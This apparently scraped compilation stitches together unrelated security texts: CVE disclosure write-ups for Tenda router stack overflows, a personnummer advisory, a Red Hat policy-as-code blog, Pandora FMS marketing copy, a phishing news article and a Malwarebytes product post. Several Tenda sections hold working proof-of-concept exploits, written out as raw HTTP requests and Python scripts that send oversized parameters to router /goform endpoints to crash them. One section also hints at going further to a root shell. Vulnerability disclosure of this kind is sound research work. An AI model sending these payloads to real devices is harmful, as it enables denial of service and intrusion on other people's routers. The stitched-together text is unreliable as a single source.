Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress.

CVE-2021-36899: Asset CleanUp: Page Speed Booster

Tenda AX12 v22.03.01.21 was discovered to contain a stack buffer overflow in the function sub_422CE4. This vulnerability allows attackers to cause a Denial of Service (DoS) via the strcpy parameter.

**Tenda Router AX12 Vulnerability**

This vulnerability lies in the `goform/setIPv6Status` page which influences the lastest version of Tenda Router AX12. (lastest version of this product is V22.03.01.21\_CN)

**Vulnerability description**

There is a stack buffer overflow vulnerability in function `sub_422CE4`

This function uses `strcpy` to copy the string pointed by `v6` into a stack buffer pointed by `v21`,while `v6` gets in a parameter called `prefixDelegate` and use that input value without any check.

![image-20220115010231776](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/2/1.png)

So when strcpy is called, a stack overflow occurs, the attacker can easily perform a **DoS Attack**.

**POC**

    POST /goform/setIPv6Status HTTP/1.1
    Host: tendawifi.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 615
    Connection: close
    Referer: http://tendawifi.com/index.html
    
    prefixDelegate=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
    

**Timeline**

*   2021.12.19 report to CVE & CNVD
*   2022.01.07 CNVD ID assigned: CNVD-2022-01443
*   2022.02.10 CVE ID assigned : CVE-2021-45392

CVE-2021-46408: IoT-CVE/Tenda/AX12/2 at main · sec-bin/IoT-CVE

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the time parameter at /goform/PowerSaveSet.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function setSmartPowerManagement， the v13 variable is obtained directly from the http request parameter time . Then v13 will be splice to stack by function sscanf without any security check, which causes stack overflow. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1999
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/sleep_mode.html?random=0.9629635312680853&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ektscvb
    
    powerSavingEn=1&time=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111100%3A0001%3A00&ledCloseType=allClose&powerSaveDelay=1
    

This PoC can result in a Dos.

CVE-2022-38311: NWPU_Projct/Tenda/AC18/5 at main · rickytriky/NWPU_Projct

Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formIPMacBindDel with the request /goform/delIpMacBind/

**\* Tenda W20E stack vulnerability****\* Version**

V15.11.0.6 (US\_W20EV4.0br\_V15.11.0.6(1068\_1546\_841)\_CN\_TDC)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2707.html

**\* Vulnerability Detail**

In function formIPMacBindDel, the content obtained by the program from the parameter "IPMacBindIndex" is passed to \_\_src, and then the \_\_src is directly copied into the indexs stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formIPMacBindDel(webs\_t wp,char \*path,char \*query)

{
  char \*\_\_src;
  char msg \[512\];
  char out \[64\];
  char indexs \[128\];
  int i;
  int n;
  char \*indexSet;
  
  memset(indexs,0,0x80);
  out.\_0\_4\_ = 0x31;
  memset(out + 4,0,0x3c);
  msg.\_0\_4\_ = 0;
  memset(msg + 4,0,0x1fc);
  \_\_src = websGetVar(wp,"IPMacBindIndex","0");
  strcpy(indexs,\_\_src); //here is overflow
  delete\_rules\_in\_list("security.ipbind.list",indexs,"\\t");
  sprintf(msg,"op=%d",5);
  send\_msg\_to\_netctrl(0xb,msg);
  CommitCfm();
  outputToWebs(wp,out);
  return;
}

**\* POC**

import requests

cmd  \= b'IPMacBindIndex=' + b'A' \* 800 

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/delIpMacBind/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40867: Router-vuls/formIPMacBindDel.md at main · CPSeek/Router-vuls

The personnummer implementation before 3.0.3 for Dart mishandles numbers in which the last four digits match the ^000[0-9]$ regular expression.

This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.

The vulnerability is determined to be low severity.

**Impact**

This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.

**Patches**

The issue have been patched in all repositories. The following versions should be updated to as soon as possible:

C# 3.0.2  
D 3.0.1  
Dart 3.0.3  
Elixir 3.0.0  
Go 3.0.1  
Java 3.3.0  
JavaScript 3.1.0  
Kotlin 1.1.0  
Lua 3.0.1  
PHP 3.0.2  
Perl 3.0.0  
Python 3.0.2  
Ruby 3.0.1  
Rust 3.0.0  
Scala 3.0.1  
Swift 1.0.1

If you are using any of the earlier packages, please update to latest.

**Workarounds**

The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be  
000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not  
000x.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Personnummer Meta
*   Email us at Personnummer Email

**References**

*   GHSA-4xh4-v2pq-jvhm
*   https://pub.dev/packages/personnummer

CVE-2023-22963: GHSA-4xh4-v2pq-jvhm - GitHub Advisory Database

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter time at /goform/saveParentControlInfo.

\# Tenda AC10 v4 was discovered stack overflow via parameter time at url /goform/saveParentControlInfo ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter time at url /goform/saveParentControlInfo. ## Vulnerability Details In function saveParentControlInfo line 23, program proceed into function compare\_parentcontrol\_time. !\[\](https://hackmd.io/\_uploads/HJvL1eGS2.png) In function compare\_parentcontrol\_time, v3 & v4 are local varialbes. !\[\](https://hackmd.io/\_uploads/r1\_vJeGB2.png) The content obtained by parameter 'time' is passed into s without length check. Then in line 27 the strings in s are formatted into v4 and v3, which leads to a stack overflow vulnerbility. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version 2. Run poc script. !\[\](https://hackmd.io/\_uploads/B17y8gMS2.png) \`\`\` import requests exp = b'a'\*100 url = "http://192.168.0.1/goform/saveParentControlInfo?time=%s" % exp payload={} headers = {} response = requests.request("GET", url, headers=headers, data=payload) print(response.text) \`\`\` Run poc.py and you will see process httpd crash, segmentation fault. !\[\](https://hackmd.io/\_uploads/H1\_kEz5S3.png) And you can write your own exp to get the root shell.

CVE-2023-34566: Tenda AC10 v4 was discovered stack overflow via parameter time at url /goform/saveParentControlInfo - HackMD

How to get started with automated policy as code: Start small but think BIG.A policy enforcement feature is coming to future versions of Red Hat Ansible Automation Platform. This blog provides more detail around where we’re heading with this exciting initiative.What is automated policy as code?Quite simply it allows you to apply policies, or in other words rules, before and/or during automation without having to know about or write those rules into your automation. You have many operational constructs you want to adhere to across your organization, and by automating them as policies, you can

**How to get started with automated policy as code: Start small but think BIG.**

A policy enforcement feature is coming to future versions of Red Hat Ansible Automation Platform. This blog provides more detail around where we’re heading with this exciting initiative.

**What is automated policy as code?**

Quite simply it allows you to apply policies, or in other words rules, before and/or during automation without having to know about or write those rules into your automation. You have many operational constructs you want to adhere to across your organization, and by automating them as policies, you can reduce risk, enable more operational consistency and feel more confident that you are actually operating in line with your expectations.

**Why Do I Need This?**

Right now, automation content writers tend to write **rules** into the actual automation, or declare variables for defaults or recommendations. This is a good use of automation, but limiting. It is hard to consistently enforce policies without a centralized solution. We want to provide a better out-of-the-box Red Hat Ansible Automation Platform solution.

In my opinion, no one has yet cracked the simple and effective way to operationalise policy as code. In the AI era, it's imperative that we can still enforce standards so AI does just the right things. For example, what if your AI concludes that it should create 1,000 cloud instances? What if you could have a policy check that requires approval to create more than 20 instances? Without these policy checks, what impacts would this have on your cloud operational budget? 

When you are able to design and apply the right policy checks, AI is in a better position to do its best work for you and your team. So, think of policy as code in this example as the guardrails that allow you to operate with AI.

**Trusted Automation Supply Chain**

The ideal automated policy as code solution will allow you to write all your rules as simply as possible, then ingest them from a source, and apply them at the relevant points and times to your automation needs:

You need to  be able to check policies at all automation stages and across your operational lifecycle. We tend to use these categories to help explain this:

**Create.** When creating automation content, check for relevant policies whilst in the editor or during CI/CD software development cycles. This “shift left” exercise will help maintain consistency and plug potential problem areas at their source, before they can have ripples and implications across your environment. Over time, we’ll utilize AI capabilities to make this even more relevant and easier.

**Manage.** Automation is now becoming mission-critical due to the need to move fast, the complexity of your existing hybrid cloud environments, and now comes AI sprawl to add even more demands. You need automation to meet all of these demands. Yet at the same time, you still need to ensure all of this operates within the bounds of any governance, risk and compliance (GRC) measures we need to adopt, whether they are internally-designed or externally mandated. This requires a centralized automation platform like Ansible Automation Platform.

**Scale.** It’s important to know what’s been done and the current compliance state so you can consider what changes or controls can mitigate potential issues. You need an audit trail of events, changes and compliance to keep auditors and regulators informed.

**Ansible Automation Platform Runtime Enforcement**

Great automation complements and fits into existing business processes. Change control management systems or mandates that certain conditions have to be adhered to for any change are very commonplace.

This is why we plan to introduce a **global** level enforcement mechanism to simplify operations when you also have to meet certain requirements.

What if you had a universal way to:

*   Enforce the need for an approved change number before running anything?
*   Not allow automation during maintenance windows or moratoriums without some form of approved exception?

These are the kinds of actions we’ll allow you to implement at a global level.

Beyond this, your automation policies need to be applied consistently, have relevance and context. This is a mechanism like an automation job runtime that could allow for further granular control and measures. This design could also provide attribute-based access control (ABAC) functionality to compliment the platform's current role-based access control (RBAC).

**What Could I Start With?**

Anything! But we advise, in true Ansible fashion, to start small and work up, whilst thinking of the bigger picture at the same time.

Let’s break this down as an example, using a cloud-based services use case. Let’s say you operate a two-cloud operating model across AWS and Microsoft Azure. You deploy all types of services and applications across these platforms in various locations. You want to ensure that standards are applied so you can stop cost escalations and always meet your security recommendations.

Looking at this from the top down, it seems to be a formidable, lengthy and complex set of challenges. But let’s start small and extend out to ultimately achieve the bigger goal.

Different cloud providers offer different ways to do things. This isn’t ideal as there is often no single standard. This is where Ansible Automation Platform comes in as a highly flexible and agnostic common automation tool with rich and extensive content collections that help you jumpstart the type of automation you need. If we can wrap all of this in a policy as code automation model, then this becomes very powerful with the enforcement you need to control costs and stay aligned on security measures.

Go for quick wins with some of your most common challenges, for example::

*   **Stop unfettered cloud instance size choices by developers**
    *   _Could be a rule to only allow certain size choices_
*   **Stop wide open public access points in their tracks**
    *   _There is no rule ensuring ANY/0.0.0.0 type ACLs are used_
*   **Only approved, tested OS and application packages are installed**
    *   _The use of ‘latest’ isn’t allowed and version choices pinned_

Straightaway, if you can nail these if you have:

*   Introduced measures to stop poor choices and potential cost sprawl
*   Stopped ‘lazy’ options being able to open up easy attack entry points
*   Improved application stability by ensuring the right software is used

These types of policies exist already and we have already demonstrated how this can be applied at a central automation platform level. We are now working on making this a simple but highly effective feature to take policy enforcement to the next level. I will be hosting a webinar on Tuesday, June 18 so you can learn more about our vision for automated policy as code. Register here or visit this web site for additional information:  \_redhat.com/PaC\_        

**Get In Touch.**

Want to know more? Got some burning questions or use cases you want to explore? Want to tell us what your needs are and explore use cases along with us and other customers? Head over to our Ansible Forum which is our policy as code advocacy group where we’ll be hanging out, excited to hear more! 

If you are a partner, we would love to talk to you. Technology partners may wish to codify their best practices into automated policies, with content collections greatly benefiting our joint customers. System integrators may wish to include automated policy as code services in existing or new services. Speak to your Red Hat contact or reach out to us via a specialized policy as code partner forum.

Automated Policy-as-Code. Start Small. Think Big.

index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.

Make smarter decisions with the data of your business

Make the best use of your Dev+Ops teams with a profesional, user friendly and easy to use monitoring suite for the main technologies of your business.

Fully featured 30-day free trial.

Customers in over 51 countries worldwide

New solutions!

Pandora FMS: Monitoring as a Service (MaaS)

Have Pandora FMS ready to use

Ready to cover all of your needs. You will not spend valuable resources on installation, maintenance and operation. Designed as a flexible and easy-to-understand subscription model.

*   No investment
*   Pay per use
*   Available 24/7
*   Easy integration with business process
*   Permanent security
*   Operational services

All-in-one Solution

Monitoring features

Companies works at their best when tools stay out of the way. With an intuitive interface and thoughtful features you can stay focused on achieving your goals while reducing monitoring costs by up to 40%.

User Experience Monitoring

Check if your application is working as expected. Detect the failure before your customers do.

Application Monitoring (APM)

Monitor your enterprise applications at all levels and obtain all the APM data you need.

Virtual Monitoring

Optimize your performance and infrastructure. Whether it’s on-premise, hybrid, virtualized or cloud.

Issue management / ITSM

Integrate the ticketing system of your infrastructure in Pandora FMS thanks to Integria IMS.

Issue management / ITSM

All your devices controlled by a single tool accessible with just a web browser, from anywhere!

Synthetic Monitoring

Knowing in real-time the vital signs that underpin your business is key in staying ahead of any possible issue.

Service oriented Monitoring

Locate the key 60.000€ problem in your company’s technology network rather than the 30€ one.

Mainframe Monitoring

Have a single platform to collect and display information, wherever the data comes from.

IoT Monitoring

Carry out an IoT monitoring of all the tasks with IP. Straightforward, affordable and at full speed.

Inventory

Collect and monitor the status of all the data from your IT infrastructure in a single tool.

Log collection

Collect, view and centralize all your logs in a single point.

Network Monitoring

See all your info as a whole even when having thousands of devices to monitor simultaneously.

Earning the trust of our clients around the world

Unlimited scalability for any type of industry

Discover how we’ve adapted to a wide array of businesses areas and company sizes, from local to international. Since we started our project in 2005, clients from all over the world have placed their trust in our product.

We connect with over 500 plugins

Here are just a few of the most used plugins in Pandora FMS.

Creating a Community

Pandora FMS for students and developers

With the Community Edition you can set up your own free, unlimited monitoring solution, an ideal tool for advanced users and small organizations. Thanks to its thousands of pages of documentation and forums you will be able to easily integrate Pandora FMS.

Upgrade to the next level

Pandora FMS Enterprise, the premium suite

Upgrade to Enterprise Edition and unlock the full potential of your monitoring tool. The security of your data as a fundamental pillar of monitoring.

Get started on your monitoring today, and save up to 40% in your monthly operations costs

CVE-2020-5844: Pandora FMS | The flexible monitoring solution

Business users receive a message from Facebook warning their accounts will be permanently suspended for using photos illegally if they don't appeal within 24 hours, leading victims to a credential-harvesting page instead.

An extensive credential-harvesting campaign has hackers leveraging Facebook copyright infringement notices to steal enterprise credentials.

Malicious actors continue to use tried and true phishing techniques and social engineering tactics to compel targets into giving up key information, attempting to generate anxiety to prompt a hasty handover. According to a Monday report from Avanan, this latest campaign sends users an email warning that because the page has uploaded a photo violating Facebook’s copyright infringement policy, the account will be permanently suspended unless they click on link to appeal the decision.

This link leads not to a Meta site but rather a credential-harvesting site, the report notes.

"Though this email has a sender address that clearly does not come from Facebook, it’s otherwise fairly believable," the report said.

Jeremy Fuchs, cybersecurity researcher and analyst at Avanan, explains the campaign could be aimed at any organization, but would be most effective with companies that rely heavily on Facebook advertising.

"The urgency indicated in the email could cause some to take quick action," he says. "These types of attacks keep on finding success because they work. Attackers are able to use this to evade legacy defenses and are able to persuade users to click on it and take action."

To guard against similar social media-based phishing attack relying on a harried response to perceived urgency, Fuchs says checking the URL for legitimacy is a good start — as is checking the sender address.

"If those are off, that’s a good sign that something is amiss," he says. "The key thing is to encourage staff to take a beat before responding. That allows them to look for things like grammar errors, mismatched sender address, wrong URLs, and more."

Fuchs adds attacks constantly evolve, and malicious actors are likely to continue to use new lures, new services, and new ways to capture the victim’s attention.

The report advises employing security tactics like always double-checking sender addresses, hovering over all URLs before clicking, and logging into the Facebook account directly to check the status of the account, instead of clicking on the URL in the email.

**Social Media a Popular Attack Vector**

The use of social media, though indispensable for many companies, also carries a risk, and Avanan and other security firms have spotted similar attacks spoofing the same brand as a sign hackers are getting people to bite.

Some 400 mobile apps posing as legitimate software on Google Play and the Apple App Store over the past year were designed to steal Facebook user credentials.

Facebook lead-generation forms had previously been repurposed to collect passwords and credit card information from unsuspecting Facebook advertisers, with attackers piggybacking on the power of the Facebook brand by using emails that look like they're coming from Facebook Ads Manager.

And according to a report this month from Outseer, brand impersonations, or brandjackings, like these increased by 274% last year as attackers continue to peddle their scams by looking like they come from reliable sources.

As digital applications proliferate and use of social media remains strong, educating users against social engineering attempts is a key part of a strong defense.

'Copyright Infringement' Lure Used for Facebook Credential Harvesting

Malwarebytes Browser Guard now warns users about recent data breaches, as well as automatically opting users out of tracking cookies.

Two things are true of data online: It will be collected and, just as easily, it will be lost. 

But a major update to Malwarebytes Browser Guard will better protect users from opaque data collection that happens every day online, as well as raising their awareness about corporate data breaches that have left their sensitive information vulnerable to harm.    

First, Browser Guard will now send helpful notifications to users when they visit a website belonging to a company that has suffered a proven data breach in the past 90 days. While everyday users might already know about some of the largest breaches in recent history—AT&T comes to mind—it can be nearly impossible to keep track of every single company that has lost user data in the past.  

With these new data breach notifications, Browser Guard will warn users about recent data breaches they perhaps never heard about, from the 2.2 million people affected by the breach of Rite Aid, to the 1.7 million people affected by the breach of Slim CD, to the 500,000 people affected by the breach of the Texas Dow Employees Credit Union.  

Importantly, Browser Guard will not send repeat notifications that pester return users. The notifications will also include direct access to the Malwarebytes Digital Footprint Portal, allowing users to check in real time whether their data was included in any flagged breach.  

In a second, added feature, Browser Guard is also making it easier to stay private online by automatically opting users out of data collection performed by tracking cookies that are littered across the internet, with no extra effort required on users’ behalf.

These types of cookies are present on nearly every single website that people visit today, from Google to Facebook to YouTube to Reddit. They are invisible pieces of code that advertisers use to track user activity even after they leave a website.

This data, when collected in aggregate, can reveal a person’s age, gender, hometown, relationship status, political beliefs, and so much more. And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space.

For more than a decade, this type of data collection happened invisibly, but when the European Union passed a sweeping set of data protection rights in 2016, much of that changed.

Following the passage of the law (referred to in short as GDPR), users began to see cumbersome popups everywhere across the web that asked about “cookie preferences”—preferences around how these invisible trackers would collect information both for the website itself and for the advertisers using that website to deliver ads.

With the latest Browser Guard update, cookie consent forms will now be auto-rejected, thus requesting the site to honor the most privacy-preserving settings.

What people experience is a simpler and less aggravating internet, where they’re no longer forced to manage yet another aspect of their privacy.

**Download for Free today:**

For a live look at the new Browser Guard, see the video below.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us